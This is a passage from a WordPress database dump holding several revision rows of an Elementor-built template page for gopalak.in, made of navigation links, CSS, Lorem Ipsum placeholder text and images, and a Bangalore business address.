.elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:24:28','2022-09-30 05:54:28','',1373,'https://gopalak.in/?p=1434',0,'revision','',0),(1435,1,'2022-09-30 11:24:28','2022-09-30 05:54:28','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:24:28','2022-09-30 05:54:28','',1373,'https://gopalak.in/?p=1435',0,'revision','',0),(1436,1,'2022-09-30 11:24:28','2022-09-30 05:54:28','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:24:28','2022-09-30 05:54:28','',1373,'https://gopalak.in/?p=1436',0,'revision','',0),(1437,1,'2022-09-30 11:24:58','2022-09-30 05:54:58','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:24:58','2022-09-30 05:54:58','',1373,'https://gopalak.in/?p=1437',0,'revision','',0),(1438,1,'2022-09-30 11:24:58','2022-09-30 05:54:58','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right 